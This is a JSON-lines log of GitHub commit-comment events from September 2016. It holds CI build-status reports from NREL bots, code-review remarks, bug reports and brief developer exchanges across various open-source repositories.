{"id":"4585337107","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19083689,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T19:18:31Z","updated_at":"2016-09-19T19:18:31Z","body":"patch-1 (felixonmars) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T19:18:31Z"}
{"id":"4585338378","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083692,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T19:18:42Z","updated_at":"2016-09-19T19:18:42Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2331 of 2336 tests passed, 0 test warnings)\n\n * 4 tests had: AUD diffs.\n * 5 tests had: EIO diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T19:18:42Z"}
{"id":"4585338727","type":"CommitCommentEvent","actor":{"login":"Cproyecto"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19083695,"position":null,"line":null,"path":null,"commit_id":"54a7fac1b65fdc0a281dd74145b960d3be1e9e8e","created_at":"2016-09-19T19:18:47Z","updated_at":"2016-09-19T19:18:47Z","body":"\r\n\r\n[Costos de desarrollo.docx](https://github.com/Unifsena/Unifsena/files/480905/Costos.de.desarrollo.docx)\r\n\r\n"}},"created_at":"2016-09-19T19:18:47Z"}
{"id":"4585339280","type":"CommitCommentEvent","actor":{"login":"jdpescat"},"repo":{"name":"ibm-bluemix-mobile-services/bms-clientsdk-android-push"},"payload":{"comment":{"id":19083697,"position":5,"line":41,"path":"lib/src/main/java/com/ibm/mobilefirstplatform/clientsdk/android/push/internal/MFPPushUrlBuilder.java","commit_id":"351be558db4ac630dad5f89ba8c8033ff7d6a75e","created_at":"2016-09-19T19:18:53Z","updated_at":"2016-09-19T19:18:53Z","body":"This update will cause the following exception:\r\n\r\nCaused by: java.lang.IllegalArgumentException: value == null"}},"created_at":"2016-09-19T19:18:53Z"}
{"id":"4585339841","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19083698,"position":23,"line":22,"path":"index.html","commit_id":"5886c2c518ed88809711fea960f4150453228fd3","created_at":"2016-09-19T19:19:00Z","updated_at":"2016-09-19T19:19:00Z","body":"Great, I got it from the preview you sent me because I wanted to test the Twitter and OpenGraph cards, but was only temporal,;)"}},"created_at":"2016-09-19T19:19:00Z"}
{"id":"4585341938","type":"CommitCommentEvent","actor":{"login":"fmapilis"},"repo":{"name":"theniall/babylon"},"payload":{"comment":{"id":19083702,"position":26,"line":21,"path":"manifest.json","commit_id":"251402e303b82abbdf9ef67187275b05f6ee86c0","created_at":"2016-09-19T19:19:23Z","updated_at":"2016-09-19T19:19:23Z","body":"👍 "}},"created_at":"2016-09-19T19:19:23Z"}
{"id":"4585344083","type":"CommitCommentEvent","actor":{"login":"jonathanong"},"repo":{"name":"koajs/csrf"},"payload":{"comment":{"id":19083707,"position":null,"line":null,"path":null,"commit_id":"9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe","created_at":"2016-09-19T19:19:47Z","updated_at":"2016-09-19T19:19:47Z","body":"manually is the best imo since commits usually have too much noise"}},"created_at":"2016-09-19T19:19:47Z"}
{"id":"4585344236","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":19083708,"position":null,"line":null,"path":null,"commit_id":"49f868dcc73b8375617e319d66a40c340e1a274e","created_at":"2016-09-19T19:19:49Z","updated_at":"2016-09-19T19:19:49Z","body":"not sure if you want to add regex for multi-ep as well.. `S01E01E02`, or `1x02.1x03`, or `E02-03` etc..\r\n\r\ncould leverage regexes from sickbeard:\r\nhttps://github.com/midgetspy/Sick-Beard/blob/development/sickbeard/name_parser/regexes.py\r\n"}},"created_at":"2016-09-19T19:19:49Z"}
{"id":"4585344393","type":"CommitCommentEvent","actor":{"login":"infojunkie"},"repo":{"name":"meedan/meedan-code"},"payload":{"comment":{"id":19083709,"position":1,"line":1,"path":"_posts/2016-09-19.md","commit_id":"1474ca7f2ecda927287d2bc12e9909358b3ab6d4","created_at":"2016-09-19T19:19:51Z","updated_at":"2016-09-19T19:19:51Z","body":"I think you need to rename to something like `2016-09-19-nlp-meedan` for it to show up on the front page. You can make sure it works locally using `jekyll serve`."}},"created_at":"2016-09-19T19:19:51Z"}
{"id":"4585347204","type":"CommitCommentEvent","actor":{"login":"pixelhandler"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19083714,"position":66,"line":252,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T19:20:22Z","updated_at":"2016-09-19T19:20:22Z","body":"@aars yeah I could setup the tracking properties here, https://github.com/pixelhandler/ember-jsonapi-resources/blob/master/addon/models/resource.js#L483 thanks for pointing that out."}},"created_at":"2016-09-19T19:20:22Z"}
{"id":"4585353980","type":"CommitCommentEvent","actor":{"login":"Cproyecto"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19083727,"position":null,"line":null,"path":null,"commit_id":"54a7fac1b65fdc0a281dd74145b960d3be1e9e8e","created_at":"2016-09-19T19:21:35Z","updated_at":"2016-09-19T19:21:35Z","body":"![diagrama de distribucion](https://cloud.githubusercontent.com/assets/21691979/18645813/5993d26a-7e74-11e6-991b-0c110e8e8947.JPG)\r\n"}},"created_at":"2016-09-19T19:21:35Z"}
{"id":"4585354413","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19083739,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T19:21:38Z","updated_at":"2016-09-19T19:21:38Z","body":"@MarcelRaad,\r\n\r\nI tried to file a bug report on Boost for the C++ runtime mis-detections at [Boost Trac](https://svn.boost.org/trac/boost/newticket). After writing the report and passing through two CAPTCHAs, Boost discarded the report as spam.\r\n\r\nI also reported the problem of discarding bug reports 3 years ago at [Issue 9173: Can't file a bug report (broken bug reporter)](http://svn.boost.org/trac/boost/ticket/9173). It looks like it has not been fixed.\r\n\r\nMaybe you will have better luck alerting Boost to their issue."}},"created_at":"2016-09-19T19:21:38Z"}
{"id":"4585357542","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19083742,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-19T19:22:12Z","updated_at":"2016-09-19T19:22:12Z","body":"2.3.0 and 3.3.0 have been released with these changes!"}},"created_at":"2016-09-19T19:22:12Z"}
{"id":"4585358047","type":"CommitCommentEvent","actor":{"login":"fmapilis"},"repo":{"name":"theniall/babylon"},"payload":{"comment":{"id":19083743,"position":11,"line":9,"path":"content/auditpage.js","commit_id":"87c987ebaebc1210cfb69379225a1e9c007ae519","created_at":"2016-09-19T19:22:17Z","updated_at":"2016-09-19T19:22:17Z","body":"use `.eq()` here - the current way this is set up will iterate through _all_ `dd` tags _every_ time a `dt` tag contains an important keyword. ie, if there are 3 important keywords and 200 `dd` tags, this will compute a total of 600 times, which is unecessary\r\n\r\nLine 1 is creating a variable for you called `index` that you can use"}},"created_at":"2016-09-19T19:22:17Z"}
{"id":"4585358262","type":"CommitCommentEvent","actor":{"login":"pixelhandler"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19083744,"position":29,"line":212,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T19:22:20Z","updated_at":"2016-09-19T19:22:20Z","body":"http://emberjs.com/api/classes/Ember.html#method_copy could work, didn't think of trying that. "}},"created_at":"2016-09-19T19:22:20Z"}
{"id":"4585359105","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19083746,"position":null,"line":null,"path":null,"commit_id":"a62da5bac9eeee8f4802acd868fbc77427fd5b91","created_at":"2016-09-19T19:22:30Z","updated_at":"2016-09-19T19:22:30Z","body":"@joshuaknox 2.3.0 and 3.3.0 are out with this change!"}},"created_at":"2016-09-19T19:22:30Z"}
{"id":"4585360621","type":"CommitCommentEvent","actor":{"login":"hardwick548"},"repo":{"name":"hardwick548/superman"},"payload":{"comment":{"id":19083748,"position":null,"line":null,"path":null,"commit_id":"10bd4ccf5d33c67e535837ba20f9d929c1cde594","created_at":"2016-09-19T19:22:46Z","updated_at":"2016-09-19T19:22:46Z","body":"I don't no what to say thanks so much "}},"created_at":"2016-09-19T19:22:46Z"}
{"id":"4585360655","type":"CommitCommentEvent","actor":{"login":"darcicidade"},"repo":{"name":"thanglenguyen/esp8266_thingspeak_homeautomation"},"payload":{"comment":{"id":19083749,"position":null,"line":null,"path":null,"commit_id":"6eb57781699d8515611084e3bc7b59d0e126d9fa","created_at":"2016-09-19T19:22:46Z","updated_at":"2016-09-19T19:22:46Z","body":"Hello, how are you?\r\ncongratulations on the code, perfect.\r\nI managed to make it run, but not I connect to thingspeak.\r\nyou have some descriptive or video to set up?"}},"created_at":"2016-09-19T19:22:46Z"}
{"id":"4585363202","type":"CommitCommentEvent","actor":{"login":"justinmakaila"},"repo":{"name":"Moya/Moya"},"payload":{"comment":{"id":19083755,"position":null,"line":null,"path":null,"commit_id":"7c41718d1fe2a1e8616264c3361154d9df566e97","created_at":"2016-09-19T19:23:14Z","updated_at":"2016-09-19T19:23:14Z","body":"This just changes ReactiveCocoa to ReactiveSwift. This should help Swift 3 carthage users continue to use Moya."}},"created_at":"2016-09-19T19:23:14Z"}
{"id":"4585365848","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19083760,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-19T19:23:46Z","updated_at":"2016-09-19T19:23:46Z","body":"This is weird. Probably some mess up in the config implementation."}},"created_at":"2016-09-19T19:23:46Z"}
{"id":"4585365892","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19083761,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-19T19:23:46Z","updated_at":"2016-09-19T19:23:46Z","body":"@rkorytkowski i have sent a sample module to reproduce on your gmail account."}},"created_at":"2016-09-19T19:23:46Z"}
{"id":"4585369076","type":"CommitCommentEvent","actor":{"login":"kytrinyx"},"repo":{"name":"exercism/xjava"},"payload":{"comment":{"id":19083770,"position":null,"line":null,"path":null,"commit_id":"37721c40bf71dd71929a6a0a133c2263b45b0768","created_at":"2016-09-19T19:24:22Z","updated_at":"2016-09-19T19:24:22Z","body":"Thank you. I recall seeing a conversation about markdown anchors, let me see if I can find it."}},"created_at":"2016-09-19T19:24:22Z"}
{"id":"4585371290","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19083777,"position":23,"line":22,"path":"index.html","commit_id":"5886c2c518ed88809711fea960f4150453228fd3","created_at":"2016-09-19T19:24:48Z","updated_at":"2016-09-19T19:24:48Z","body":"I'm not sure what you mean. Does it still not work?"}},"created_at":"2016-09-19T19:24:48Z"}
{"id":"4585372728","type":"CommitCommentEvent","actor":{"login":"kytrinyx"},"repo":{"name":"exercism/xjava"},"payload":{"comment":{"id":19083780,"position":null,"line":null,"path":null,"commit_id":"37721c40bf71dd71929a6a0a133c2263b45b0768","created_at":"2016-09-19T19:25:05Z","updated_at":"2016-09-19T19:25:05Z","body":"This, maybe? https://github.com/exercism/exercism.io/pull/3085"}},"created_at":"2016-09-19T19:25:05Z"}
{"id":"4585374389","type":"CommitCommentEvent","actor":{"login":"ShatteredMotion"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19083783,"position":5,"line":117,"path":"template/packageAdd.tpl","commit_id":"3fe99d2052467846ad5ab04b6d82e789284ba95c","created_at":"2016-09-19T19:25:22Z","updated_at":"2016-09-19T19:25:22Z","body":"`uniquie`? 😆 "}},"created_at":"2016-09-19T19:25:22Z"}
{"id":"4585382351","type":"CommitCommentEvent","actor":{"login":"schnittchen"},"repo":{"name":"bitwalker/distillery"},"payload":{"comment":{"id":19083796,"position":null,"line":null,"path":null,"commit_id":"42de09eee1037d78cfd829a3bc0e85fcfabb5804","created_at":"2016-09-19T19:26:51Z","updated_at":"2016-09-19T19:26:51Z","body":"Oh nice improvement :)"}},"created_at":"2016-09-19T19:26:51Z"}
{"id":"4585383100","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19083799,"position":null,"line":null,"path":null,"commit_id":"a6eaa4e89b208b22624600118ff186249357951f","created_at":"2016-09-19T19:26:59Z","updated_at":"2016-09-19T19:26:59Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a6eaa4e89b208b22624600118ff186249357951f-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a6eaa4e89b208b22624600118ff186249357951f-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-19T19:26:59Z"}
{"id":"4585384598","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19083800,"position":null,"line":null,"path":null,"commit_id":"d0b537bf7d61b825f3d1b307f5e5d7d6da398185","created_at":"2016-09-19T19:27:17Z","updated_at":"2016-09-19T19:27:17Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=74)"}},"created_at":"2016-09-19T19:27:17Z"}
{"id":"4585385240","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19083802,"position":null,"line":null,"path":null,"commit_id":"1a4483056f56682239319fa2b81fc1a49ece1073","created_at":"2016-09-19T19:27:25Z","updated_at":"2016-09-19T19:27:25Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=74)"}},"created_at":"2016-09-19T19:27:25Z"}
{"id":"4585385341","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19083803,"position":null,"line":null,"path":null,"commit_id":"042084485dcd8897f0c0e10affa85bd450b99cd2","created_at":"2016-09-19T19:27:26Z","updated_at":"2016-09-19T19:27:26Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=74)"}},"created_at":"2016-09-19T19:27:26Z"}
{"id":"4585393894","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083819,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-19T19:29:05Z","updated_at":"2016-09-19T19:29:05Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T19:29:05Z"}
{"id":"4585395176","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19083823,"position":null,"line":null,"path":null,"commit_id":"d8b2193a1feaafb77fe4268b6b3e189d9b03e723","created_at":"2016-09-19T19:29:18Z","updated_at":"2016-09-19T19:29:18Z","body":"Just checking, it will update it if it already exists still?"}},"created_at":"2016-09-19T19:29:18Z"}
{"id":"4585398058","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19083831,"position":null,"line":null,"path":null,"commit_id":"0a85330479c2b2fd009dc0e0003d4728fd976410","created_at":"2016-09-19T19:29:48Z","updated_at":"2016-09-19T19:29:48Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Y3Lzll2xSpKbsJjpBrkcWQ"}},"created_at":"2016-09-19T19:29:48Z"}
{"id":"4585399572","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19083835,"position":null,"line":null,"path":null,"commit_id":"d8b2193a1feaafb77fe4268b6b3e189d9b03e723","created_at":"2016-09-19T19:30:05Z","updated_at":"2016-09-19T19:30:05Z","body":"Yes, according to the code, but will verify during testing."}},"created_at":"2016-09-19T19:30:05Z"}
{"id":"4585403862","type":"CommitCommentEvent","actor":{"login":"malte0811"},"repo":{"name":"malte0811/ImmersiveEngineering"},"payload":{"comment":{"id":19083848,"position":null,"line":null,"path":null,"commit_id":"582e7c26a744ac372e93f799fb6a4887850dc34d","created_at":"2016-09-19T19:30:52Z","updated_at":"2016-09-19T19:30:52Z","body":"@BluSunrize Are you opposed to any of these changes? I want to make IC2 wires have different cost based on connection length (to be able to add glass fiber wire without worrying about balance) and I need these changes for it. They are completely backwards compatible."}},"created_at":"2016-09-19T19:30:52Z"}
{"id":"4585404453","type":"CommitCommentEvent","actor":{"login":"tfesenko"},"repo":{"name":"RepreZen/SwagEdit"},"payload":{"comment":{"id":19083850,"position":12,"line":12,"path":"com.reprezen.swagedit/src/com/reprezen/swagedit/assist/Proposal.java","commit_id":"980a8c96bb31d21609dfff5cf955bf6ccb9b0f07","created_at":"2016-09-19T19:30:59Z","updated_at":"2016-09-19T19:30:59Z","body":"Nice"}},"created_at":"2016-09-19T19:30:59Z"}
{"id":"4585406961","type":"CommitCommentEvent","actor":{"login":"tfesenko"},"repo":{"name":"RepreZen/SwagEdit"},"payload":{"comment":{"id":19083854,"position":33,"line":33,"path":"com.reprezen.swagedit/src/com/reprezen/swagedit/assist/Proposal.java","commit_id":"980a8c96bb31d21609dfff5cf955bf6ccb9b0f07","created_at":"2016-09-19T19:31:26Z","updated_at":"2016-09-19T19:31:26Z","body":"`prefix` is used in type-ahead, right?"}},"created_at":"2016-09-19T19:31:26Z"}
{"id":"4585412194","type":"CommitCommentEvent","actor":{"login":"tomfriedhof"},"repo":{"name":"javraindawn/hapi-auth-jwt2"},"payload":{"comment":{"id":19083865,"position":null,"line":null,"path":null,"commit_id":"dbf7f0237d81e0f161792ff16cc936268b78c1ca","created_at":"2016-09-19T19:32:28Z","updated_at":"2016-09-19T19:32:28Z","body":"@javraindawn is this something that can be contributed back to upstream? or specific to an application?"}},"created_at":"2016-09-19T19:32:28Z"}
{"id":"4585417307","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"vikrantdheer/screenplay-exercises"},"payload":{"comment":{"id":19083874,"position":32,"line":32,"path":"src/test/java/serenitylabs/tutorials/trains/WhenPlanningATrip.java","commit_id":"c5e7d434b45c4aeb25902099b3adf62d48d892bc","created_at":"2016-09-19T19:33:27Z","updated_at":"2016-09-19T19:33:27Z","body":"Hard-coding the path like this would (will) compromise the CI builds, so should be done on the command line."}},"created_at":"2016-09-19T19:33:27Z"}
{"id":"4585418620","type":"CommitCommentEvent","actor":{"login":"rmandelb"},"repo":{"name":"GalSim-developers/GalSim"},"payload":{"comment":{"id":19083875,"position":5,"line":5,"path":"README.md","commit_id":"6da538c78118bed35f17e31900872781fc08924e","created_at":"2016-09-19T19:33:42Z","updated_at":"2016-09-19T19:33:42Z","body":"I think this is missing a bracket after the final parens on line 5?  It looks weird on https://github.com/GalSim-developers/GalSim/tree/%23580 and I think this might be why."}},"created_at":"2016-09-19T19:33:42Z"}
{"id":"4585420033","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"vikrantdheer/screenplay-exercises"},"payload":{"comment":{"id":19083877,"position":33,"line":33,"path":"src/test/java/serenitylabs/tutorials/trains/WhenPlanningATrip.java","commit_id":"c5e7d434b45c4aeb25902099b3adf62d48d892bc","created_at":"2016-09-19T19:33:58Z","updated_at":"2016-09-19T19:33:58Z","body":"Don't create your own browser instance; let Serenity manage the WebDriver lifecycle."}},"created_at":"2016-09-19T19:33:58Z"}
{"id":"4585420360","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19083880,"position":null,"line":null,"path":null,"commit_id":"3af41bf3779e81725265a1bc78b9a6a3bd640b67","created_at":"2016-09-19T19:34:02Z","updated_at":"2016-09-19T19:34:02Z","body":"Oh, I overlooked that. Okey, my bad."}},"created_at":"2016-09-19T19:34:02Z"}
{"id":"4585422355","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19083883,"position":null,"line":null,"path":null,"commit_id":"75af78040d6ebf269c4513a954b12abe14d6feef","created_at":"2016-09-19T19:34:24Z","updated_at":"2016-09-19T19:34:24Z","body":"Some thing is wrong with conversion between UInt64.\r\n\r\nHere is test code.\r\n            ObjectStreamWrapper ow = new ObjectStreamWrapper();\r\n\r\n            Byte value1 = 1;\r\n            SByte value2 = 2;\r\n            Int16 value3 = 3;\r\n            Int32 value4 = 4;\r\n            Int64 value5 = 5;\r\n            UInt16 value6 = 6;\r\n            UInt32 value7 = 7;\r\n            UInt64 value8 = 8;\r\n            Single value9 = 9.0F;\r\n            Double value10 = 10.0;\r\n\r\n            ow.input(value1);\r\n            ow.input(value2);\r\n            ow.input(value3);\r\n            ow.input(value4);\r\n            ow.input(value5);\r\n            ow.input(value6);\r\n            ow.input(value7);\r\n            ow.input(value8);\r\n            ow.input(value9);\r\n            ow.input(value10);\r\n\r\n            Double value10a = ow.outputDouble();\r\n            Single value9a = ow.outputSingle();\r\n            UInt64 value8a = ow.outputUInt64();\r\n            UInt32 value7a = ow.outputUInt32();\r\n            UInt16 value6a = ow.outputUInt16();\r\n            Int64 value5a = ow.outputInt64();\r\n            Int32 value4a = ow.outputInt32();\r\n            Int16 value3a = ow.outputInt16();\r\n            SByte value2a = ow.outputSByte();\r\n            Byte value1a = ow.outputByte();\r\n"}},"created_at":"2016-09-19T19:34:24Z"}
{"id":"4585423240","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19083885,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T19:34:34Z","updated_at":"2016-09-19T19:34:34Z","body":"Facebook looks like this now: \r\n\r\n![opengraph_fprsmap](https://cloud.githubusercontent.com/assets/8948865/18646191/bdc1fafa-7eb0-11e6-9346-1e344b22c839.PNG)\r\n\r\nValidated using Facebook's [OpenGraph object debugger](https://developers.facebook.com/tools/debug/og/object/).\r\n"}},"created_at":"2016-09-19T19:34:34Z"}
{"id":"4585425560","type":"CommitCommentEvent","actor":{"login":"nsoranzo"},"repo":{"name":"dannon/pysam"},"payload":{"comment":{"id":19083887,"position":23,"line":861,"path":"pysam/ctabix.pyx","commit_id":"b2d358668b611ffbf1fbfa1eab306c0b0459473a","created_at":"2016-09-19T19:35:00Z","updated_at":"2016-09-19T19:35:00Z","body":"Shouldn't this be:\r\n```python\r\n    if not already_compressed and not filename.endswith(\".gz\"):\r\n```\r\n? Otherwise this breaks code working on default pysam, e.g. https://github.com/galaxyproject/tools-iuc/blob/master/datatypes/snpsift_dbnsfp_datatypes/tabular_to_dbnsfp.py#L31"}},"created_at":"2016-09-19T19:35:00Z"}
{"id":"4585427625","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19083892,"position":null,"line":null,"path":null,"commit_id":"75af78040d6ebf269c4513a954b12abe14d6feef","created_at":"2016-09-19T19:35:23Z","updated_at":"2016-09-19T19:35:23Z","body":"Ill be back to work  on it later."}},"created_at":"2016-09-19T19:35:23Z"}
{"id":"4585427990","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19083893,"position":null,"line":null,"path":null,"commit_id":"191784433813dd098879f8218cb9a804f77d545e","created_at":"2016-09-19T19:35:26Z","updated_at":"2016-09-19T19:35:26Z","body":"I agree. Simply create a PR and we can merge it upstream."}},"created_at":"2016-09-19T19:35:26Z"}
{"id":"4585430885","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"vikrantdheer/screenplay-exercises"},"payload":{"comment":{"id":19083901,"position":34,"line":34,"path":"src/test/java/serenitylabs/tutorials/trains/WhenPlanningATrip.java","commit_id":"c5e7d434b45c4aeb25902099b3adf62d48d892bc","created_at":"2016-09-19T19:35:57Z","updated_at":"2016-09-19T19:35:57Z","body":"In Serenity you manage implicit waits (if required) with the `webdriver.timeouts.implicitlywait` property in your `serenity.properties` file. "}},"created_at":"2016-09-19T19:35:57Z"}
{"id":"4585431524","type":"CommitCommentEvent","actor":{"login":"incanus"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":19083902,"position":null,"line":null,"path":null,"commit_id":"940124ff713a960d7f70071779dd37d07010fa80","created_at":"2016-09-19T19:36:04Z","updated_at":"2016-09-19T19:36:04Z","body":"Somehow this commit seems to break my iOS build @jfirebaugh. I noticed it with dc1861f6d5391707126a20dbb0272f5bd3522de8, did a `reset` to my 0bd66d40ddf9e75f860fe18e7c80de9c840f48ac from Friday and didn't see it, and just now did a `bisect` to track it down to this commit. \r\n\r\n![screen shot 2016-09-19 at 12 35 48 pm](https://cloud.githubusercontent.com/assets/17722/18646263/9d4acd2e-7e65-11e6-9a91-af00a051b19a.png)\r\n"}},"created_at":"2016-09-19T19:36:04Z"}
{"id":"4585432965","type":"CommitCommentEvent","actor":{"login":"micchickenburger"},"repo":{"name":"enove/Thriver"},"payload":{"comment":{"id":19083905,"position":null,"line":null,"path":null,"commit_id":"f4e57a2a6f05b11d82203c96c2f907f7072de9e4","created_at":"2016-09-19T19:36:20Z","updated_at":"2016-09-19T19:36:20Z","body":"`details_shim.init();` is responsible for searching the currently rendered page for details/summary elements, and causing them to work in browsers which don't support them.  If there remains race conditions, we may have to design a different solution."}},"created_at":"2016-09-19T19:36:20Z"}
{"id":"4585434364","type":"CommitCommentEvent","actor":{"login":"incanus"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":19083909,"position":null,"line":null,"path":null,"commit_id":"940124ff713a960d7f70071779dd37d07010fa80","created_at":"2016-09-19T19:36:36Z","updated_at":"2016-09-19T19:36:36Z","body":"Repro procees is `reset`, `make iproj`, then try to build. Xcode 8.0. Looking into it. "}},"created_at":"2016-09-19T19:36:36Z"}
{"id":"4585434877","type":"CommitCommentEvent","actor":{"login":"aaronschachter"},"repo":{"name":"DoSomething/northstar-js"},"payload":{"comment":{"id":19083911,"position":5,"line":63,"path":"lib/northstar-client.js","commit_id":"35522f2056b2bae2033b8c6bbccd9f1a22706e83","created_at":"2016-09-19T19:36:42Z","updated_at":"2016-09-19T19:36:42Z","body":"doe"}},"created_at":"2016-09-19T19:36:42Z"}
